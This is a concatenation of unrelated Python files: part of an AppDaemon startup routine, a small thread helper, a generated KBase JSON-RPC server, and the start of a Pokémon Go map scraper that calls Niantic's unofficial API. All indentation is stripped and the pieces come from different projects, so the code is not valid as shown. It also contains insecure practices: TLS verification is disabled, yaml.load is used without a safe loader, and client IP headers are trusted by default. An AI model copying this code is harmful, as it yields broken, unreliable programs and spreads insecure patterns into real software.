parser.add_argument("-t", "--tick", help="time that a tick in the schedular lasts (seconds)", default=1, type=float)
parser.add_argument("-s", "--starttime", help="start time for scheduler <YYYY-MM-DD HH:MM:SS>", type=str)
parser.add_argument("-e", "--endtime", help="end time for scheduler <YYYY-MM-DD HH:MM:SS>", type=str, default=None)
parser.add_argument("-i", "--interval", help="multiplier for scheduler tick", type=float, default=1)
parser.add_argument("-D", "--debug", help="debug level", default="INFO", choices=
[
"DEBUG", "INFO", "WARNING", "ERROR", "CRITICAL"
])
parser.add_argument('-v', '--version', action='version', version='%(prog)s ' + __version__)
parser.add_argument('--commtype', help="Communication Library to use", default="WEBSOCKETS", choices=
[
"SSE",
"WEBSOCKETS"
])
parser.add_argument('--profiledash', help=argparse.SUPPRESS, action='store_true')
parser.add_argument('--convertcfg', help="Convert existing .cfg file to yaml", action='store_true')
# Windows does not have Daemonize package so disallow
if platform.system() != "Windows":
parser.add_argument("-d", "--daemon", help="run as a background process", action="store_true")
args = parser.parse_args()
conf.tick = args.tick
conf.interval = args.interval
conf.loglevel = args.debug
conf.profile_dashboard = args.profiledash
if args.starttime is not None:
conf.now = datetime.datetime.strptime(args.starttime, "%Y-%m-%d %H:%M:%S").timestamp()
else:
conf.now = datetime.datetime.now().timestamp()
if args.endtime is not None:
conf.endtime = datetime.datetime.strptime(args.endtime, "%Y-%m-%d %H:%M:%S")
if conf.tick != 1 or conf.interval != 1 or args.starttime is not None:
conf.realtime = False
config_dir = args.config
conf.commtype = args.commtype
if platform.system() != "Windows":
isdaemon = args.daemon
else:
isdaemon = False
if config_dir is None:
config_file_conf = find_path("appdaemon.cfg")
config_file_yaml = find_path("appdaemon.yaml")
else:
config_file_conf = os.path.join(config_dir, "appdaemon.cfg")
if not os.path.isfile(config_file_conf):
config_file_conf = None
config_file_yaml = os.path.join(config_dir, "appdaemon.yaml")
if not os.path.isfile(config_file_yaml):
config_file_yaml = None
config = None
config_from_yaml = False
if config_file_yaml is not None and args.convertcfg is False:
config_from_yaml = True
config_file = config_file_yaml
with open(config_file_yaml, 'r') as yamlfd:
config_file_contents = yamlfd.read()
try:
config = yaml.load(config_file_contents)
except yaml.YAMLError as exc:
print("ERROR", "Error loading configuration")
if hasattr(exc, 'problem_mark'):
if exc.context is not None:
print("ERROR", "parser says")
print("ERROR", str(exc.problem_mark))
print("ERROR", str(exc.problem) + " " + str(exc.context))
else:
print("ERROR", "parser says")
print("ERROR", str(exc.problem_mark))
print("ERROR", str(exc.problem))
sys.exit()
else:
# Read Config File
config_file = config_file_conf
config = configparser.ConfigParser()
config.read_file(open(config_file_conf))
if args.convertcfg is True:
yaml_file = os.path.join(os.path.dirname(config_file_conf), "appdaemon.yaml")
print("Converting {} to {}".format(config_file_conf, yaml_file))
new_config = {}
for section in config:
if section != "DEFAULT":
if section == "AppDaemon":
new_config["AppDaemon"] = {}
new_config["HADashboard"] = {}
new_config["HASS"] = {}
new_section = ""
for var in config[section]:
if var in ("dash_compile_on_start", "dash_dir", "dash_force_compile", "dash_url"):
new_section = "HADashboard"
elif var in ("ha_key", "ha_url", "timeout"):
new_section = "HASS"
else:
new_section = "AppDaemon"
new_config[new_section][var] = config[section][var]
else:
new_config[section] = {}
for var in config[section]:
new_config[section][var] = config[section][var]
with open(yaml_file, "w") as outfile:
yaml.dump(new_config, outfile, default_flow_style=False)
sys.exit()
conf.config_dir = os.path.dirname(config_file)
conf.config = config
conf.logfile = config['AppDaemon'].get("logfile")
conf.errorfile = config['AppDaemon'].get("errorfile")
conf.threads = int(config['AppDaemon'].get('threads'))
conf.certpath = config['AppDaemon'].get("cert_path")
conf.app_dir = config['AppDaemon'].get("app_dir")
conf.latitude = config['AppDaemon'].get("latitude")
conf.longitude = config['AppDaemon'].get("longitude")
conf.elevation = config['AppDaemon'].get("elevation")
conf.time_zone = config['AppDaemon'].get("time_zone")
conf.rss_feeds = config['AppDaemon'].get("rss_feeds")
conf.rss_update = config['AppDaemon'].get("rss_update")
if config_from_yaml is True:
conf.timeout = config['HASS'].get("timeout")
conf.ha_url = config['HASS'].get('ha_url')
conf.ha_key = config['HASS'].get('ha_key', "")
if 'HADashboard' in config:
conf.dash_url = config['HADashboard'].get("dash_url")
conf.dashboard_dir = config['HADashboard'].get("dash_dir")
if config['HADashboard'].get("dash_force_compile") == "1":
conf.dash_force_compile = True
else:
conf.dash_force_compile = False
if config['HADashboard'].get("dash_compile_on_start") == "1":
conf.dash_compile_on_start = True
else:
conf.dash_compile_on_start = False
else:
conf.timeout = config['AppDaemon'].get("timeout")
conf.ha_url = config['AppDaemon'].get('ha_url')
conf.ha_key = config['AppDaemon'].get('ha_key', "")
conf.dash_url = config['AppDaemon'].get("dash_url")
conf.dashboard_dir = config['AppDaemon'].get("dash_dir")
if config['AppDaemon'].get("dash_force_compile") == "1":
conf.dash_force_compile = True
else:
conf.dash_force_compile = False
if config['AppDaemon'].get("dash_compile_on_start") == "1":
conf.dash_compile_on_start = True
else:
conf.dash_compile_on_start = False
if config['AppDaemon'].get("disable_apps") == "1":
conf.apps = False
else:
conf.apps = True
if config['AppDaemon'].get("cert_verify", True) == False:
conf.certpath = False
if conf.dash_url is not None:
conf.dashboard = True
url = urlparse(conf.dash_url)
if url.scheme != "http":
raise ValueError("Invalid scheme for 'dash_url' - only HTTP is supported")
dash_net = url.netloc.split(":")
conf.dash_host = dash_net[0]
try:
conf.dash_port = dash_net[1]
except IndexError:
conf.dash_port = 80
if conf.dash_host == "":
raise ValueError("Invalid host for 'dash_url'")
if conf.threads is None:
conf.threads = 10
if conf.logfile is None:
conf.logfile = "STDOUT"
if conf.errorfile is None:
conf.errorfile = "STDERR"
if isdaemon and (
conf.logfile == "STDOUT" or conf.errorfile == "STDERR"
or conf.logfile == "STDERR" or conf.errorfile == "STDOUT"
):
raise ValueError("STDOUT and STDERR not allowed with -d")
# Setup Logging
conf.logger = logging.getLogger("log1")
numeric_level = getattr(logging, args.debug, None)
conf.logger.setLevel(numeric_level)
conf.logger.propagate = False
# formatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s')
# Send to file if we are daemonizing, else send to console
fh = None
if conf.logfile != "STDOUT":
fh = RotatingFileHandler(conf.logfile, maxBytes=1000000, backupCount=3)
fh.setLevel(numeric_level)
# fh.setFormatter(formatter)
conf.logger.addHandler(fh)
else:
# Default for StreamHandler() is sys.stderr
ch = logging.StreamHandler(stream=sys.stdout)
ch.setLevel(numeric_level)
# ch.setFormatter(formatter)
conf.logger.addHandler(ch)
# Setup compile output
conf.error = logging.getLogger("log2")
numeric_level = getattr(logging, args.debug, None)
conf.error.setLevel(numeric_level)
conf.error.propagate = False
# formatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s')
if conf.errorfile != "STDERR":
efh = RotatingFileHandler(
conf.errorfile, maxBytes=1000000, backupCount=3
)
else:
efh = logging.StreamHandler()
efh.setLevel(numeric_level)
# efh.setFormatter(formatter)
conf.error.addHandler(efh)
# Setup dash output
if config['AppDaemon'].get("accessfile") is not None:
conf.dash = logging.getLogger("log3")
numeric_level = getattr(logging, args.debug, None)
conf.dash.setLevel(numeric_level)
conf.dash.propagate = False
# formatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s')
efh = RotatingFileHandler(
config['AppDaemon'].get("accessfile"), maxBytes=1000000, backupCount=3
)
efh.setLevel(numeric_level)
# efh.setFormatter(formatter)
conf.dash.addHandler(efh)
else:
conf.dash = conf.logger
# Startup message
ha.log(conf.logger, "INFO", "AppDaemon Version {} starting".format(__version__))
ha.log(conf.logger, "INFO", "Configuration read from: {}".format(config_file))
# Check with HA to get various info
ha_config = None
if conf.ha_url is not None:
while ha_config is None:
try:
ha_config = ha.get_ha_config()
except:
ha.log(
conf.logger, "WARNING", "Unable to connect to Home Assistant, retrying in 5 seconds")
if conf.loglevel == "DEBUG":
ha.log(conf.logger, "WARNING", '-' * 60)
ha.log(conf.logger, "WARNING", "Unexpected error:")
ha.log(conf.logger, "WARNING", '-' * 60)
ha.log(conf.logger, "WARNING", traceback.format_exc())
ha.log(conf.logger, "WARNING", '-' * 60)
time.sleep(5)
conf.version = parse_version(ha_config["version"])
conf.ha_config = ha_config
conf.latitude = ha_config["latitude"]
conf.longitude = ha_config["longitude"]
conf.time_zone = ha_config["time_zone"]
if "elevation" in ha_config:
conf.elevation = ha_config["elevation"]
if "elevation" in config['AppDaemon']:
ha.log(conf.logger, "WARNING", "'elevation' directive is deprecated, please remove")
else:
conf.elevation = config['AppDaemon']["elevation"]
# Use the supplied timezone
os.environ['TZ'] = conf.time_zone
# Now we have logging, warn about deprecated directives
#if "latitude" in config['AppDaemon']:
# ha.log(conf.logger, "WARNING", "'latitude' directive is deprecated, please remove")
#if "longitude" in config['AppDaemon']:
# ha.log(conf.logger, "WARNING", "'longitude' directive is deprecated, please remove")
#if "timezone" in config['AppDaemon']:
# ha.log(conf.logger, "WARNING", "'timezone' directive is deprecated, please remove")
#if "time_zone" in config['AppDaemon']:
# ha.log(conf.logger, "WARNING", "'time_zone' directive is deprecated, please remove")
init_sun()
config_file_modified = os.path.getmtime(config_file)
# Add appdir and subdirs to path
if conf.apps:
if conf.app_dir is None:
if config_dir is None:
conf.app_dir = find_path("apps")
else:
conf.app_dir = os.path.join(config_dir, "apps")
for root, subdirs, files in os.walk(conf.app_dir):
if root[-11:] != "__pycache__":
sys.path.insert(0, root)
# find dashboard dir
if conf.dashboard:
if conf.dashboard_dir is None:
if config_dir is None:
conf.dashboard_dir = find_path("dashboards")
else:
conf.dashboard_dir = os.path.join(config_dir, "dashboards")
#
# Figure out where our data files are
#
conf.dash_dir = os.path.dirname(__file__)
#
# Setup compile directories
#
if config_dir is None:
conf.compile_dir = find_path("compiled")
else:
conf.compile_dir = os.path.join(config_dir, "compiled")
# Start main loop
if isdaemon:
keep_fds = [fh.stream.fileno(), efh.stream.fileno()]
pid = args.pidfile
daemon = Daemonize(app="appdaemon", pid=pid, action=run,
keep_fds=keep_fds)
daemon.start()
while True:
time.sleep(1)
else:
run()
if __name__ == "__main__":
main()
|
simple_async.py
|
import threading
import time
EMIT_NOTIFICATIONS = False
def ct():
return time.strftime('%H:%M:%S')
class AsyncExec:
def __init__(self, f, args=(), kwargs={}, name='unnamed'):
assert callable(f)
self._name = name
self._function = f
self._args = args
self._kwargs = kwargs
self._thread = threading.Thread(target=self._wrapper)
self._is_running = False
@property
def is_running(self):
return self._is_running
def _wrapper(self):
res = self._function(*self._args, **self._kwargs)
self._result = res
if EMIT_NOTIFICATIONS:
print(ct(), 'Thread', self._name, 'finished')
def start(self):
if EMIT_NOTIFICATIONS:
print(ct(), 'Thread', self._name, 'has started')
if self.has_result():
delattr(self, '_result')
if not self.is_running:
self._is_running = True
self._thread.start()
return self
def has_result(self):
return hasattr(self, '_result')
def result(self):
assert self.has_result()
return self._result
@classmethod
def create_and_start(cls, *args, **kwargs):
return cls(*args, **kwargs).start()
def wait(self):
if self.is_running:
self._thread.join()
self._is_running = False
return self._result
else:
raise Exception('You have to start the Thread first.')
|
kb_DRAMServer.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import datetime
import json
import os
import random as _random
import sys
import traceback
from getopt import getopt, GetoptError
from multiprocessing import Process
from os import environ
from wsgiref.simple_server import make_server
import requests as _requests
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError, \
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from biokbase import log
from kb_DRAM.authclient import KBaseAuth as _KBaseAuth
try:
from ConfigParser import ConfigParser
except ImportError:
from configparser import ConfigParser
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-service-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'kb_DRAM'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from kb_DRAM.kb_DRAMImpl import kb_DRAM # noqa @IgnorePep8
impl_kb_DRAM = kb_DRAM(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = JSONServerError()
newerr.trace = traceback.format_exc()
if len(e.args) == 1:
newerr.data = repr(e.args[0])
else:
newerr.data = repr(e.args)
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is same as call() except the return value is a python
object instead of JSON string. This method is mainly only useful for
debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if 'types' in self.method_data[request['method']]:
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def provenance(self):
callbackURL = os.environ.get('SDK_CALLBACK_URL')
if callbackURL:
# OK, there's a callback server from which we can get provenance
arg_hash = {'method': 'CallbackServer.get_provenance',
'params': [],
'version': '1.1',
'id': str(_random.random())[2:]
}
body = json.dumps(arg_hash)
response = _requests.post(callbackURL, data=body,
timeout=60)
response.encoding = 'utf-8'
if response.status_code == 500:
if ('content-type' in response.headers and
response.headers['content-type'] ==
'application/json'):
err = response.json()
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, response.text)
else:
raise ServerError('Unknown', 0, response.text)
if not response.ok:
response.raise_for_status()
resp = response.json()
if 'result' not in resp:
raise ServerError('Unknown', 0,
'An unknown server error occurred')
return resp['result'][0]
else:
return self.get('provenance')
class ServerError(Exception):
'''
The call returned an error. Fields:
name - the name of the error.
code - the error code.
message - a human readable error message.
data - the server side stacktrace.
'''
def __init__(self, name, code, message, data=None, error=None):
super(Exception, self).__init__(message)
self.name = name
self.code = code
self.message = message if message else ''
self.data = data or error or ''
# data = JSON RPC 2.0, error = 1.1
def __str__(self):
return self.name + ': ' + str(self.code) + '. ' + self.message + \
'\n' + self.data
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'kb_DRAM'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_kb_DRAM.run_kb_dram_annotate,
name='kb_DRAM.run_kb_dram_annotate',
types=[dict])
self.method_authentication['kb_DRAM.run_kb_dram_annotate'] = 'required' # noqa
self.rpc_service.add(impl_kb_DRAM.run_kb_dram_annotate_genome,
name='kb_DRAM.run_kb_dram_annotate_genome',
types=[dict])
self.method_authentication['kb_DRAM.run_kb_dram_annotate_genome'] = 'required' # noqa
self.rpc_service.add(impl_kb_DRAM.run_kb_dramv_annotate,
name='kb_DRAM.run_kb_dramv_annotate',
types=[dict])
self.method_authentication['kb_DRAM.run_kb_dramv_annotate'] = 'required' # noqa
self.rpc_service.add(impl_kb_DRAM.status,
name='kb_DRAM.status',
types=[dict])
authurl = config.get(AUTH) if config else None
self.auth_client = _KBaseAuth(authurl)
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {
'call_stack': [{'time': self.now_in_utc(),
'method': req['method']}
]
}
prov_action = {'service': ctx['module'],
'method': ctx['method'],
'method_params': req['params']
}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
auth_req = self.method_authentication.get(
method_name, 'none')
if auth_req != 'none':
if token is None and auth_req == 'required':
err = JSONServerError()
err.data = (
'Authentication required for ' +
'kb_DRAM ' +
'but no authentication header was passed')
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user = self.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception as e:
if auth_req == 'required':
err = JSONServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print('Request method was %s\n' % environ['REQUEST_METHOD'])
# print('Environment dictionary is:\n%s\n' % pprint.pformat(environ))
# print('Request body was: %s' % request_body)
# print('Result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result))
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body.encode('utf8')]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
e = error['error'].get('error')
if not e:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run a using the single threaded python BaseHTTP service
# listening on port 9999 by default execute this file
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print("Monkeypatching std libraries for async")
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {'': application}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
'''
By default, will start the server on localhost on a system assigned port
in the main thread. Excecution of the main thread will stay in the server
main loop until interrupted. To run the server in a separate process, and
thus allow the stop_server method to be called, set newprocess = True. This
will also allow returning of the port number.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print("Listening on port %s" % port)
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user = application.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
if __name__ == "__main__":
if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
os.path.isfile(sys.argv[1])):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print(str(err)) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print("Host set to %s" % host)
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print("Listening on port %s" % port)
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
example.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
from __future__ import print_function
import sys
if not ('packages.zip' in sys.path):
sys.path.insert(0, 'packages.zip')
import flask
from flask import Flask, render_template
from flask_googlemaps import GoogleMaps
from flask_googlemaps import Map
from flask_googlemaps import icons
import os
import re
import sys
import struct
import json
import requests
import argparse
import getpass
import threading
import werkzeug.serving
import pokemon_pb2
import time
import errno
from google.protobuf.internal import encoder
from google.protobuf.message import DecodeError
from s2sphere import *
from datetime import datetime
from geopy.geocoders import GoogleV3
try:
from gpsoauth import perform_master_login, perform_oauth
except:
pass
from geopy.exc import GeocoderTimedOut, GeocoderServiceError
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from requests.adapters import ConnectionError
from requests.models import InvalidURL
from transform import *
import singleton
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
API_URL = 'https://pgorelease.nianticlabs.com/plfe/rpc'
LOGIN_URL = \
'https://sso.pokemon.com/sso/login?service=https://sso.pokemon.com/sso/oauth2.0/callbackAuthorize'
LOGIN_OAUTH = 'https://sso.pokemon.com/sso/oauth2.0/accessToken'
APP = 'com.nianticlabs.pokemongo'
with open('credentials.json') as file:
credentials = json.load(file)
PTC_CLIENT_SECRET = credentials.get('ptc_client_secret', None)
ANDROID_ID = credentials.get('android_id', None)
SERVICE = credentials.get('service', None)
CLIENT_SIG = credentials.get('client_sig', None)
GOOGLEMAPS_KEY = credentials.get('gmaps_key', None)
SESSION = requests.session()
SESSION.headers.update({'User-Agent': 'Niantic App'})
SESSION.verify = False
global_password = None
global_token = None
access_token = None
global_parent_pid = None
DEBUG = True
VERBOSE_DEBUG = False # if you want to write raw request/response to the console
COORDS_LATITUDE = 0
COORDS_LONGITUDE = 0
COORDS_ALTITUDE = 0
FLOAT_LAT = 0
FLOAT_LONG = 0
NEXT_LAT = 0
NEXT_LONG = 0
auto_refresh = 0
default_step = 0.001
api_endpoint = None
pokemons = {}
gyms = {}
pokestops = {}
numbertoteam = { # At least I'm pretty sure that's it. I could be wrong and then I'd be displaying the wrong owner team of gyms.
0: 'Gym',
1: 'Mystic',
2: 'Valor',
3: 'Instinct',
}
origin_lat, origin_lon = None, None
is_ampm_clock = False
# stuff for in-background search thread
search_thread = None
def sysprint(msg):
print(msg, file=sys.stderr)
def memoize(obj):
cache = obj.cache = {}
@functools.wraps(obj)
def memoizer(*args, **kwargs):
key = str(args) + str(kwargs)
if key not in cache:
cache[key] = obj(*args, **kwargs)
return cache[key]
return memoizer
def parse_unicode(bytestring):
decoded_string = bytestring.decode(sys.getfilesystemencoding())
return decoded_string
def debug(message):
sysprint('[-] {}'.format(message))
def time_left(ms):
s = ms / 1000
(m, s) = divmod(s, 60)
(h, m) = divmod(m, 60)
return (h, m, s)
def encode(cellid):
output = []
encoder._VarintEncoder()(output.append, cellid)
return ''.join(output)
def getNeighbors():
origin = CellId.from_lat_lng(LatLng.from_degrees(FLOAT_LAT,
FLOAT_LONG)).parent(15)
walk = [origin.id()]
# 10 before and 10 after
next = origin.next()
prev = origin.prev()
for i in range(10):
walk.append(prev.id())
walk.append(next.id())
next = next.next()
prev = prev.prev()
return walk
def f2i(float):
return struct.unpack('<Q', struct.pack('<d', float))[0]
def f2h(float):
return hex(struct.unpack('<Q', struct.pack('<d', float))[0])
def h2f(hex):
return struct.unpack('<d', struct.pack('<Q', int(hex, 16)))[0]
def retrying_set_location(location_name):
"""
Continue trying to get co-ords from Google Location until we have them
:param location_name: string to pass to Location API
:return: None
"""
while True:
try:
set_location(location_name)
return
except (GeocoderTimedOut, GeocoderServiceError), e:
debug(
'retrying_set_location: geocoder exception ({}), retrying'.format(
str(e)))
time.sleep(1.25)
def set_location(location_name):
geolocator = GoogleV3()
prog = re.compile('^(\-?\d+(\.\d+)?),\s*(\-?\d+(\.\d+)?)$')
global origin_lat
global origin_lon
if prog.match(location_name):
local_lat, local_lng = [float(x) for x in location_name.split(",")]
alt = 0
origin_lat, origin_lon = local_lat, local_lng
else:
loc = geolocator.geocode(location_name)
origin_lat, origin_lon = local_lat, local_lng = loc.latitude, loc.longitude
